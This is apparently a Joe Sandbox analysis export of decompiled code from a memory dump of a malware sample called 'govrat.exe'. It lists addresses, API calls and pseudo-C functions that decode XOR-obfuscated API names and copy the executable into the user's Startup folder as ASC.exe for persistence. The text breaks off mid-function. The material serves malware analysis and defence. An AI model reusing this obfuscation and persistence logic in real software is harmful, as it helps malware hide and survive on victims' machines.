0x0095d7df
0x0095d7e2
0x0095d7e9
0x0095d7ec
0x0095d7f3
0x0095d7f6
0x0095d7fa
0x0095d7fd
0x0095d802
0x0095d80c
0x0095d810
0x0095d818
0x0095d81b
0x0095d822
0x0095d825
0x0095d82c
0x0095d82f
0x0095d836
0x0095d839
0x0095d840
0x0095d843
0x0095d84a
0x0095d84d
0x0095d854
0x0095d857
0x0095d85e
0x0095d861
0x0095d868
0x0095d86b
0x0095d872
0x0095d875
0x0095d87c
0x0095d87f
0x0095d886
0x0095d889
0x0095d890
0x0095d893
0x0095d89a
0x0095d89d
0x0095d8a4
0x0095d8a5
0x0095d8ac
0x0095d8ae
0x0095d8b9
0x0095d8c2
0x0095d8cc
0x0095d8d3
0x0095d8d7
0x0095d8e8
0x0095d8eb
0x0095d8ef
0x0095d8f2
0x0095d8f6
0x0095d8f9
0x0095d8fd
0x0095d900
0x0095d904
0x0095d907
0x0095d90b
0x0095d90e
0x0095d912
0x0095d915
0x0095d919
0x0095d91c
0x0095d920
0x0095d923
0x0095d927
0x0095d92a
0x0095d92e
0x0095d92f
0x0095d933
0x0095d935
0x0095d93d
0x0095d946
0x0095d94d
0x0095d950
0x0095d954
0x0095d963
0x0095d96b
0x0095d975
0x0095d978
0x0095d97f
0x0095d982
0x0095d989
0x0095d98c
0x0095d993
0x0095d996
0x0095d99d
0x0095d9a0
0x0095d9a7
0x0095d9aa
0x0095d9b1
0x0095d9b4
0x0095d9bb
0x0095d9be
0x0095d9c5
0x0095d9c8
0x0095d9cf
0x0095d9d2
0x0095d9d9
0x0095d9dc
0x0095d9e3
0x0095d9e6
0x0095d9ed
0x0095d9f0
0x0095d9f7
0x0095d9f8
0x0095d9ff
0x0095da01
0x0095da0c
0x0095da15
0x0095da1f
0x0095da22
0x0095da26
0x0095da37
0x0095da45
0x0095da59
0x0095da61
0x0095da66
0x0095da78
0x0095da7d
0x0095da85
0x0095dabf
0x0095dac2
0x0095dac2
0x0095dac5
0x0095dac8
0x0095dacd
0x0095dad1
0x0095dad3
0x0095dad9
0x0095dadc
0x0095dadf
0x0095dadf
0x0095dae2
0x0095dae5
0x0095daea
0x0095daed
0x0095daef
0x0095daf9
0x0095dafc
0x0095db01
0x0095db02
0x0095db03
0x0095da87
0x0095da87
0x0095da8d
0x0095da90
0x0095da90
0x0095da93
0x0095da96
0x0095da9b
0x0095da9d
0x0095daa5
0x0095dab0
0x0095dab5
0x0095daba
0x0095db06
0x0095db0c
0x0095db0f
0x0095db0f
0x0095db12
0x0095db15
0x0095db26
0x0095db29
0x0095db2f
0x0095db34
0x0095d954
0x0095d8d7
0x0095d810
0x0095d722
0x0095d724
0x00000000
0x0095d727
0x0095d730
0x0095d731
0x0095d732
0x0095d733
0x0095d737
0x0095d73e
0x0095d73f
0x0095d742
0x0095d749
0x0095d751
0x00000000

APIs

RegQueryValueExW.KERNEL32(?,?), ref: 0095D80C
RegQueryValueExW.KERNEL32(?,?,?,?,?,?), ref: 0095D8D3
RegQueryValueExW.KERNEL32(?,?,?,?,?,00000004,?,?,?,?), ref: 0095D950
RegQueryValueExW.KERNEL32(?,?,?,?,?,00000004), ref: 0095DA22

Strings

(, xrefs: 0095DA2A

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00953626, Relevance: 9.1, APIs: 6, Instructions: 55

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E00953626(void* __ebx, void* __edx, intOrPtr* __edi, intOrPtr* __esi) {
				intOrPtr _t3;
				intOrPtr _t4;
				intOrPtr _t5;
				intOrPtr _t6;
				void* _t7;
				void* _t9;
				intOrPtr* _t11;
				intOrPtr _t12;
				intOrPtr* _t14;
				void* _t15;
				void* _t16;
				intOrPtr _t17;
				intOrPtr* _t25;
				intOrPtr* _t29;

				_t25 = __edi;
				_t19 = __ebx;
				_t3 =  *__esi(); // executed
				_push( *0x9738d8);
				 *0x9738d4 = _t3; // executed
				_t4 =  *__esi(); // executed
				_push( *0x9738dc);
				 *0x9738d8 = _t4; // executed
				_t5 =  *__esi(); // executed
				_push( *0x9738e0);
				 *0x9738dc = _t5; // executed
				_t6 =  *__esi(); // executed
				 *0x9738e0 = _t6;
				_t7 = L009582EA();
				if(_t7 == 0) {
					L5:
					L0095329C(_t19);
					_t9 = 0;
					__eflags = 0;
				} else {
					L00A0FDFC(__ebx, __edi);
					_t11 =  *_t25( *0x9738d4, E00953420, _t7); // executed
					_t12 =  *_t11();
					 *0x972904 = _t12;
					if(_t12 == 0xffffffff) {
						goto L5;
					} else {
						_t29 = E00958FD6(1, 0x214);
						if(_t29 == 0) {
							goto L5;
						} else {
							_t14 =  *_t25( *0x9738dc,  *0x972904, _t29); // executed
							_t15 =  *_t14();
							_t33 = _t15;
							if(_t15 == 0) {
								goto L5;
							} else {
								_push(0);
								_push(_t29);
								_t16 = L009532D9(__ebx, __edx, _t25, _t29, _t33);
								_push(__edx);
								_t17 = L00981263(_t16, _t29);
								 *(_t29 + 4) =  *(_t29 + 4) | 0xffffffff;
								 *_t29 = _t17;
								_t9 = 1;
							}
						}
					}
				}
				return _t9;
			}

0x00953626
0x00953626
0x00953626
0x00953628
0x0095362e
0x00953633
0x00953635
0x0095363b
0x00953640
0x00953642
0x00953648
0x0095364d
0x0095364f
0x00953654
0x0095365b
0x009536c0
0x009536c0
0x009536c5
0x009536c5
0x0095365d
0x0095365e
0x0095366e
0x00953670
0x00953672
0x0095367a
0x00000000
0x0095367c
0x00953688
0x0095368e
0x00000000
0x00953690
0x0095369d
0x0095369f
0x009536a1
0x009536a3
0x00000000
0x009536a5
0x009536a5
0x009536a7
0x009536a8
0x009536af
0x009536b0
0x009536b5
0x009536b9
0x009536bd
0x009536bd
0x009536a3
0x0095368e
0x0095367a
0x009536c9

APIs

RtlEncodePointer.NTDLL ref: 00953626
RtlEncodePointer.NTDLL ref: 00953633
RtlEncodePointer.NTDLL ref: 00953640
RtlEncodePointer.NTDLL ref: 0095364D
RtlDecodePointer.NTDLL(Function_00003420,00000000), ref: 0095366E

Part of subcall function 00958FD6: Sleep.KERNEL32(00000000), ref: 00958FFE

RtlDecodePointer.NTDLL(00000000), ref: 0095369D

Part of subcall function 0095329C: TlsFree.KERNEL32(00000016), ref: 009532C7

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 009658AB, Relevance: 7.6, APIs: 5, Instructions: 138
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E009658AB() {
				struct HINSTANCE__* _v8;
				char _v11;
				intOrPtr _v15;
				intOrPtr _v19;
				char _v20;
				char _v23;
				intOrPtr _v27;
				intOrPtr _v31;
				char _v32;
				char _v35;
				intOrPtr _v39;
				intOrPtr _v43;
				char _v44;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				char _v84;
				char _v86;
				intOrPtr _v90;
				intOrPtr _v94;
				intOrPtr _v98;
				intOrPtr _v102;
				char _v104;
				void* __ebx;
				void* __ebp;
				struct HINSTANCE__* _t89;
				void* _t91;
				_Unknown_base(*)()* _t93;
				void* _t94;
				_Unknown_base(*)()* _t96;
				void* _t97;
				_Unknown_base(*)()* _t99;
				void* _t100;
				_Unknown_base(*)()* _t102;
				void* _t103;
				_Unknown_base(*)()* _t105;
				signed int _t117;
				_Unknown_base(*)()** _t119;
				void* _t123;

				_v70 = 0xa4;
				_v72 = 0xed;
				_v74 = 0xf4;
				_v76 = 0xe5;
				_v78 = 0xf3;
				_v80 = 0xe8;
				_v82 = 0xec;
				_t119 =  *0x975974; // 0x1b2d78
				_v84 = 0xf7;
				_v68 = 0;
				_t117 = 0;
				do {
					 *(_t123 + _t117 * 2 - 0x50) =  *(_t123 + _t117 * 2 - 0x50) ^ 0x000000a4;
					_t117 = _t117 + 1;
					_t125 = _t117 - 8;
				} while (_t117 < 8);
				_push( &_v84);
				_v68 = 1;
				_push(0);
				_t89 = L009D2753( &_v84, 0, _t125);
				_v8 = _t89;
				if(_t89 == 0) {
					L19:
					__eflags = 0;
					return 0;
				}
				_v52 = 0xaafdd9de;
				_v56 = 0xd9c3d2ef;
				_v60 = 0xcfc6c3ec;
				_v64 = 0xc2decbfa;
				_v48 = 0;
				_t91 = 0;
				do {
					 *(_t123 + _t91 - 0x3c) =  *(_t123 + _t91 - 0x3c) ^ 0x000000aa;
					_t91 = _t91 + 1;
				} while (_t91 < 0x10);
				_v48 = 1;
				_t93 = GetProcAddress(_v8,  &_v64); // executed
				 *_t119 = _t93;
				_v90 = 0xaef9cbc3;
				_v94 = 0xcfe0cbc2;
				_v98 = 0xc7e8cac0;
				_v102 = 0xc7e8c6da;
				_v104 = 0xcffe;
				_v86 = 0;
				_t94 = 0;
				do {
					 *(_t123 + _t94 - 0x64) =  *(_t123 + _t94 - 0x64) ^ 0x000000ae;
					_t94 = _t94 + 1;
				} while (_t94 < 0x12);
				_v86 = 1;
				_t96 = GetProcAddress(_v8,  &_v104); // executed
				 *(_t119 + 4) = _t96;
				_v15 = 0xb1e6f8c1;
				_v19 = 0xdcf2c3c5;
				_v20 = 0xe2;
				_v11 = 0;
				_t97 = 0;
				do {
					 *(_t123 + _t97 - 0x10) =  *(_t123 + _t97 - 0x10) ^ 0x000000b1;
					_t97 = _t97 + 1;
				} while (_t97 < 9);
				_v11 = 1;
				_t99 = GetProcAddress(_v8,  &_v20); // executed
				 *(_t119 + 8) = _t99;
				_v27 = 0xb4e3c6dc;
				_v31 = 0xf7e6c6c0;
				_v32 = 0xe7;
				_v23 = 0;
				_t100 = 0;
				do {
					 *(_t123 + _t100 - 0x1c) =  *(_t123 + _t100 - 0x1c) ^ 0x000000b4;
					_t100 = _t100 + 1;
				} while (_t100 < 9);
				_v23 = 1;
				_t102 = GetProcAddress(_v8,  &_v32); // executed
				 *(_t119 + 0xc) = _t102;
				_v39 = 0xb7e0fec5;
				_v43 = 0xc3e4c5c3;
				_v44 = 0xe4;
				_v35 = 0;
				_t103 = 0;
				do {
					 *(_t123 + _t103 - 0x28) =  *(_t123 + _t103 - 0x28) ^ 0x000000b7;
					_t103 = _t103 + 1;
				} while (_t103 < 9);
				_v35 = 1;
				_t105 = GetProcAddress(_v8,  &_v44); // executed
				 *(_t119 + 0x10) = _t105;
				if( *_t119 == 0 ||  *(_t119 + 4) == 0 ||  *(_t119 + 8) == 0 ||  *(_t119 + 0xc) == 0 || _t105 == 0) {
					goto L19;
				} else {
					return 1;
				}
			}

0x009658b8
0x009658bf
0x009658c6
0x009658cd
0x009658d4
0x009658db
0x009658e2
0x009658ed
0x009658f3
0x009658f7
0x009658fa
0x009658fc
0x009658fe
0x00965903
0x00965904
0x00965904
0x0096590c
0x0096590d
0x00965911
0x00965912
0x00965917
0x0096591c
0x00965a59
0x00965a59
0x00000000
0x00965a59
0x00965922
0x00965929
0x00965930
0x00965937
0x0096593e
0x00965941
0x00965943
0x00965943
0x00965948
0x00965949
0x0096595c
0x00965960
0x00965962
0x00965964
0x0096596b
0x00965972
0x00965979
0x00965980
0x00965986
0x00965989
0x0096598b
0x0096598b
0x00965990
0x00965991
0x0096599d
0x009659a1
0x009659a3
0x009659a6
0x009659ad
0x009659b4
0x009659b8
0x009659bb
0x009659bd
0x009659bd
0x009659c2
0x009659c3
0x009659cf
0x009659d3
0x009659d5
0x009659d8
0x009659df
0x009659e6
0x009659ea
0x009659ed
0x009659ef
0x009659ef
0x009659f4
0x009659f5
0x00965a01
0x00965a05
0x00965a07
0x00965a0a
0x00965a11
0x00965a18
0x00965a1c
0x00965a1f
0x00965a21
0x00965a21
0x00965a26
0x00965a27
0x00965a33
0x00965a37
0x00965a39
0x00965a3f
0x00000000
0x00965a54
0x00000000
0x00965a56

APIs

GetProcAddress.KERNEL32(00960300,000000AA,00000014,00000000,?,00000000,00974D08), ref: 00965960
GetProcAddress.KERNEL32(00960300,000000AE), ref: 009659A1
GetProcAddress.KERNEL32(00960300,000000B1), ref: 009659D3
GetProcAddress.KERNEL32(00960300,000000B4), ref: 00965A05
GetProcAddress.KERNEL32(00960300,000000B7), ref: 00965A37

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 009520FF, Relevance: 7.6, APIs: 5, Instructions: 94

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E009520FF(void* __ebx, void* __edx, void* __edi) {
				void* _t18;
				intOrPtr _t20;
				void* _t24;
				intOrPtr _t25;
				void* _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				intOrPtr _t31;
				void* _t44;
				signed int _t45;
				void* _t48;
				void* _t51;
				intOrPtr _t52;
				void* _t53;

				_t49 = __edi;
				_t48 = __edx;
				_t42 = __ebx;
				_t52 =  *0x976b38; // 0x0
				if(_t52 == 0) {
					_push(0);
					_push(0);
					_push(1);
					_push(0);
					_push(__ebx);
					L00A03E20(_t18, __ebx, __edi, 0);
				}
				_t53 =  *0x950000 - 0x5a4d; // 0x5a4d
				if(_t53 == 0) {
					_t20 =  *0x95003c; // 0xf0
					__eflags =  *((intOrPtr*)(_t20 + 0x950000)) - 0x4550;
					if( *((intOrPtr*)(_t20 + 0x950000)) != 0x4550) {
						goto L3;
					} else {
						_t43 = 0x10b;
						__eflags =  *((intOrPtr*)(_t20 + 0x950018)) - 0x10b;
						if( *((intOrPtr*)(_t20 + 0x950018)) != 0x10b) {
							goto L3;
						} else {
							__eflags =  *((intOrPtr*)(_t20 + 0x950074)) - 0xe;
							if( *((intOrPtr*)(_t20 + 0x950074)) <= 0xe) {
								goto L3;
							} else {
								__eflags =  *(_t20 + 0x9500e8);
								_t7 =  *(_t20 + 0x9500e8) != 0;
								__eflags = _t7;
								_t43 = 0 | _t7;
								 *(_t51 - 0x1c) = _t7;
							}
						}
					}
				} else {
					L3:
					 *(_t51 - 0x1c) = 0;
				}
				if(L009522EB() == 0) {
					L009520C0(_t48, 0x1c);
					_pop(_t43);
				}
				if(L0095354F(_t49) == 0) {
					L009520C0(_t48, 0x10);
					_pop(_t43);
				}
				L00958007();
				 *((intOrPtr*)(_t51 - 4)) = 0;
				_t24 = E00957DC2(_t42, _t49); // executed
				_t56 = _t24;
				if(_t24 < 0) {
					_t24 = L009525D6(_t48, _t56);
					_t43 = 0x1b;
				}
				_push(_t51); // executed
				_t25 = L00A00B3A(_t24, _t49); // executed
				 *0x976b34 = _t25;
				 *0x973240 = L00957D2B(_t42, 0);
				_t27 = L00957C70(_t43);
				_t57 = _t27;
				if(_t27 < 0) {
					L009525D6(_t48, _t57);
					_t43 = 8;
				}
				_t28 = E009579FA(_t43, _t48, _t49);
				_t58 = _t28;
				if(_t28 < 0) {
					_push(9);
					L009525D6(_t48, _t58);
				}
				_t29 = E009523B5(_t49, 0, 1); // executed
				_pop(_t44);
				_t59 = _t29;
				if(_t29 != 0) {
					L009525D6(_t48, _t59);
					_t44 = _t29;
				}
				_t30 = L0095799B(_t44);
				if(( *(_t51 - 0x3c) & 0x00000001) == 0) {
					_t45 = 0xa;
				} else {
					_t45 =  *(_t51 - 0x38) & 0x0000ffff;
				}
				_push(_t45);
				_push(_t30);
				_t31 = E00961829(0x950000, 0); // executed
				 *((intOrPtr*)(_t51 - 0x20)) = _t31;
				if( *(_t51 - 0x1c) == 0) {
					L0095258C(_t31);
				}
				L009525B8();
				 *((intOrPtr*)(_t51 - 4)) = 0xfffffffe;
				return E009580A5( *((intOrPtr*)(_t51 - 0x20)));
			}

0x009520ff
0x009520ff
0x009520ff
0x00952101
0x00952107
0x00952109
0x0095210a
0x0095210b
0x0095210d
0x0095210e
0x0095210f
0x0095210f
0x00952119
0x00952120
0x00952127
0x0095212c
0x00952136
0x00000000
0x00952138
0x00952138
0x0095213d
0x00952144
0x00000000
0x00952146
0x00952146
0x0095214d
0x00000000
0x0095214f
0x00952151
0x00952157
0x00952157
0x00952157
0x0095215a
0x0095215a
0x0095214d
0x00952144
0x00952122
0x00952122
0x00952122
0x00952122
0x00952164
0x00952168
0x0095216d
0x0095216d
0x00952175
0x00952179
0x0095217e
0x0095217e
0x0095217f
0x00952184
0x00952187
0x0095218c
0x0095218e
0x00952192
0x00952197
0x00952197
0x00952198
0x00952199
0x0095219e
0x009521a8
0x009521ad
0x009521b2
0x009521b4
0x009521b8
0x009521bd
0x009521bd
0x009521be
0x009521c3
0x009521c5
0x009521c7
0x009521c9
0x009521ce
0x009521d1
0x009521d6
0x009521d7
0x009521d9
0x009521dc
0x009521e1
0x009521e1
0x009521e2
0x009521eb
0x009521f5
0x009521ed
0x009521ed
0x009521ed
0x009521f6
0x009521f7
0x009521fe
0x00952203
0x00952209
0x0095220c
0x0095220c
0x00952211
0x00952246
0x00952255

APIs

__RTC_Initialize.LIBCMT ref: 0095217F
__amsg_exit.LIBCMT ref: 00952192

Part of subcall function 00957C70: _parse_cmdline.LIBCMT ref: 00957CC7
Part of subcall function 00957C70: _parse_cmdline.LIBCMT ref: 00957D08

__amsg_exit.LIBCMT ref: 009521B8

Part of subcall function 009579FA: _strlen.LIBCMT ref: 00957A24
Part of subcall function 009579FA: _strlen.LIBCMT ref: 00957A55

__amsg_exit.LIBCMT ref: 009521C9

Part of subcall function 009523B5: __initterm_e.LIBCMT ref: 009523EB

__amsg_exit.LIBCMT ref: 009521DC

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 009613C5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108
windowthread

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E009613C5(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* _t4;
				void* _t5;
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr* _t16;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t30;
				void* _t34;
				void* _t37;
				signed int _t38;
				void* _t42;
				void* _t44;
				void* _t51;
				void* _t69;
				char** _t72;

				_t51 = __edx;
				_t37 = __ecx;
				_t4 = E00960693(); // executed
				if(_t4 != 0) {
					_push(_t34);
					_push(_t34);
					_push(_t34);
					_push(0x95f8f4);
					_push(_t34);
					_push(_t34);
					return L0097BAA1(_t4, _t34, _t37);
				}
				_push(_t4);
				_t5 = L00A090ED(_t34);
				__eflags = _t5 - 4;
				if(_t5 != 4) {
					_t38 = 8;
					memcpy(0x975914, 0x97079c, _t38 << 2);
					memcpy(0x975934, 0x9707c0, 0 << 2);
					_t42 = 8;
					_t65 = 0x9707e4;
					memcpy(0x9758f4, 0x9707e4, 0 << 2);
					_t72 = _t69 + 0x24;
					E0095DDE1(0x974f18, 0x974f1c); // executed
					 *_t72 = L"C:\\Users\\angela\\AppData\\Roaming\\MICROS~1\\Windows\\STARTM~1\\Programs\\Startup";
					E0095FAC9(0, _t51, __eflags);
					 *_t72 = L"C:\\Users\\angela\\AppData\\Roaming\\MICROS~1\\Windows\\STARTM~1\\Programs\\Startup\\ASC.exe"; // executed
					L009601FD(__eflags); // executed
					 *_t72 = L"C:\\Users\\angela\\Desktop\\govrat.exe";
					E0095FB12(0x974f18, _t51, 0x9707e4 + _t42 + _t42, 0x9707e4, __eflags);
					_t44 = 8; // executed
					_t13 = L0095F5AF(0x974f18, 0x9707e4 + _t42 + _t42, 0x9707e4); // executed
					__eflags = _t13;
					if(__eflags == 0) {
						L10:
						_t14 = L00960340(_t65, __eflags);
						__eflags = _t14;
						if(_t14 != 0) {
							goto L8;
						} else {
							_t65 = 0x1388;
							_push(0x1388);
							E0095D184();
							_t19 = L00960383(0x1388, __eflags);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L8;
							} else {
								_push(0x1388);
								E0095D184();
								_t21 = E0096524E(0x974f18); // executed
								__eflags = _t21;
								if(_t21 != 0) {
									__eflags =  *0x9759a4; // 0x0
									if(__eflags == 0) {
										L0096106C(_t51, __eflags, 0x974f18); // executed
										 *_t72 = 0x7d0;
										E0095D184();
										E00960BBC(0x974f18); // executed
									}
									_push(L0095F5EF(0x974f18, 0, _t65));
									L009A7EBD(_t65);
									PostMessageW( *0x9759b0, 0x400, 0, 0); // executed
									PostMessageW( *0x9759b0, 0x405, 0, 0); // executed
								}
							}
						}
					} else {
						_t30 = E009602B6(0x974f18, __eflags);
						__eflags = _t30;
						if(_t30 != 0) {
							_push(0);
							E009603C5(0x974f18, _t44, _t51, 0, 0x9707e4);
						}
						L8:
						__eflags =  *0x9759a4; // 0x0
						if(__eflags != 0) {
							_t16 =  *0x974f14; // 0x0
							_push(0);
							 *_t16 = 1;
							RtlExitUserThread();
							goto L10;
						}
					}
					__eflags = 0;
					return 0;
				} else {
					_push(_t34);
					return L00A0270E(_t5, _t37);
				}
				goto L17;
			}

0x009613c5
0x009613c5
0x009613c5
0x009613cc
0x009613ce
0x009613cf
0x009613d0
0x009613d1
0x009613d6
0x009613d7
0x00000000
0x009613d8
0x009613ec
0x009613ed
0x009613f2
0x009613f5
0x00961400
0x0096140d
0x0096141a
0x0096141e
0x0096141f
0x00961433
0x00961433
0x00961435
0x0096143a
0x00961441
0x00961446
0x0096144d
0x00961452
0x00961459
0x0096145e
0x0096145f
0x00961466
0x00961468
0x0096149a
0x0096149a
0x0096149f
0x009614a1
0x00000000
0x009614a3
0x009614a3
0x009614a8
0x009614a9
0x009614af
0x009614b4
0x009614b6
0x00000000
0x009614b8
0x009614b8
0x009614b9
0x009614c0
0x009614c6
0x009614c8
0x009614ca
0x009614d0
0x009614d3
0x009614d8
0x009614df
0x009614e6
0x009614eb
0x009614f1
0x009614f2
0x00961504
0x00961513
0x00961513
0x009614c8
0x009614b6
0x0096146a
0x0096146c
0x00961471
0x00961473
0x00961475
0x00961476
0x0096147b
0x0096147c
0x0096147c
0x00961482
0x00961488
0x0096148d
0x0096148e
0x00961494
0x00000000
0x00961494
0x00961482
0x00961517
0x0096151d
0x009613f7
0x009613f7
0x009613fd
0x009613fd
0x00000000

APIs

PostMessageW.USER32(00000405,00000000,00000000), ref: 00961513

Part of subcall function 009603C5: CloseHandle.KERNEL32(?), ref: 00960452

Part of subcall function 00960340: CloseHandle.KERNEL32(00000000), ref: 00960377

RtlExitUserThread.NTDLL(00000000,00000000), ref: 00961494

Part of subcall function 0095D184: CloseHandle.KERNEL32(00000000), ref: 0095D1A0

PostMessageW.USER32(00000400,00000000,00000000,00000000), ref: 00961504

Strings

C:\Users\user\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ASC.exe, xrefs: 00961446

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00961520, Relevance: 6.5, APIs: 5, Instructions: 201
sleep

C-Code - Quality: 57%

			E00961520(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12, signed int _a16) {
				long _v12;
				char _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				char _v28;
				signed int _t48;
				signed int _t56;
				void* _t58;
				void* _t60;
				int _t62;
				void* _t63;
				intOrPtr _t66;
				void* _t67;
				intOrPtr _t69;
				signed int _t81;
				signed int _t90;
				void* _t96;
				void* _t97;

				_t91 = __esi;
				_t84 = __edx;
				_t71 = __ebx;
				_t96 = _t97;
				_t41 = _a8;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				if(_t41 != 1) {
					__eflags = _t41 - 0xf;
					if(_t41 == 0xf) {
						L39:
						_push(_a16);
						_push(_a12);
						_push(_a8);
						_push(_a4);
						return L00986584(_t41);
					} else {
						__eflags = _t41 - 5;
						if(_t41 == 5) {
							goto L39;
						} else {
							__eflags = _t41 - 2;
							if(_t41 == 2) {
								goto L39;
							} else {
								__eflags = _t41 - 0x10;
								if(_t41 != 0x10) {
									__eflags = _t41 - 0x12;
									if(_t41 != 0x12) {
										__eflags = _t41 - 0x16;
										if(__eflags != 0) {
											__eflags = _t41 - 0x400;
											if(_t41 != 0x400) {
												__eflags = _t41 - 0x463;
												if(_t41 != 0x463) {
													__eflags = _t41 - 0x401;
													if(_t41 != 0x401) {
														__eflags = _t41 - 0x402;
														if(__eflags != 0) {
															__eflags = _t41 - 0x403;
															if(_t41 != 0x403) {
																__eflags = _t41 - 0x404;
																if(_t41 == 0x404) {
																	goto L39;
																} else {
																	__eflags = _t41 - 0x464;
																	if(_t41 != 0x464) {
																		__eflags = _t41 - 0x405;
																		if(_t41 != 0x405) {
																			__eflags = _t41 - 0x4a;
																			if(_t41 == 0x4a) {
																				__eflags =  *_a16 - 1;
																				if( *_a16 == 1) {
																					_push( &_v28);
																					return L009771C0( &_v28, __edx, 1);
																				}
																			}
																			goto L39;
																		} else {
																			_push( &_v12);
																			__eflags = 0;
																			_push(0);
																			_push(0);
																			_push(L0096089D);
																			_push(0);
																			_push(0);
																			return L009D99C7( &_v12);
																		}
																	} else {
																		_push( &_v12);
																		_push(0);
																		_push(0);
																		_push(0x960baf);
																		_push(0);
																		_push(0);
																		_push(_t96);
																		_t41 = L0099E834( &_v12, 0, __ecx);
																		goto L39;
																	}
																}
															} else {
																_t48 = _a16;
																asm("cdq");
																_t81 = 0x32;
																_t41 = _t48 / _t81;
																_v12 = _t48 % _t81;
																_t90 = _t48 / _t81;
																while(1) {
																	__eflags = _t90;
																	if(_t90 == 0) {
																		break;
																	}
																	_t90 = _t90 - 1;
																	__eflags = _t90;
																	Sleep(0x32);
																}
																Sleep(_v12);
																goto L39;
															}
														} else {
															_push(__edx);
															_t41 = L009C22C5(_t41, __edx, 1, __eflags);
															__eflags = _t41 - 4;
															if(_t41 == 4) {
																_v16 = 0x16a;
																_v18 = 0x14b;
																_v20 = 0x11e;
																_v22 = 0x118;
																_v24 = 0x10f;
																_v26 = 0x106;
																_v28 = 0x12b;
																_v14 = 0;
																_t56 = 0;
																__eflags = 0;
																do {
																	 *(_t96 + _t56 * 2 - 0x18) =  *(_t96 + _t56 * 2 - 0x18) ^ 0x0000016a;
																	_t56 = _t56 + 1;
																	__eflags = _t56 - 7;
																} while (_t56 < 7);
																_push(0);
																_push( &_v28);
																_push(0x9706d0);
																_push(0);
																_v14 = 1;
																_push(0);
																_t41 = L00998713( &_v28, 0);
															}
															goto L39;
														}
													} else {
														_push(0x10);
														__eflags = 0;
														_push(0);
														_push(__ecx);
														_t58 = L0099D45A(_t41);
														_push(0x9759b4);
														_push(0);
														_push(_t58);
														_push(E0096125F);
														_push(0);
														_push(0);
														return L0099A17E(_t58);
													}
												} else {
													_t60 =  *0x972f0c; // 0xb8
													_v12 = 0;
													__eflags = _t60 - 0xffffffff;
													if(__eflags == 0) {
														CloseHandle( *0x972f0c);
														_t62 = CloseHandle( *0x972f10);
														_push(0);
														_push(0);
														_push(1);
														_push(0);
														_push(0);
														_t63 = L0099C977(_t62, 0, __eflags);
														_push( &_v12);
														_push(0);
														_push(_t63);
														_push(0x95ff4d);
														_push(0);
														_push(0);
														 *0x972f0c = _t63;
														return L0099D5F1(_t63, _t84, 1);
													} else {
														_push(_t60);
														return L009E7129(_t60, __ecx, __edx);
													}
												}
											} else {
												_push(0);
												_push(0);
												_push(0);
												_push(E009687B6);
												_push(0);
												_push(0);
												_push(__ecx); // executed
												_t41 = L009D2BA7(_t41); // executed
												 *0x972f08 = _t41;
												goto L39;
											}
										} else {
											goto L11;
										}
									} else {
										_t66 =  *0x9759a8; // 0x41ae60
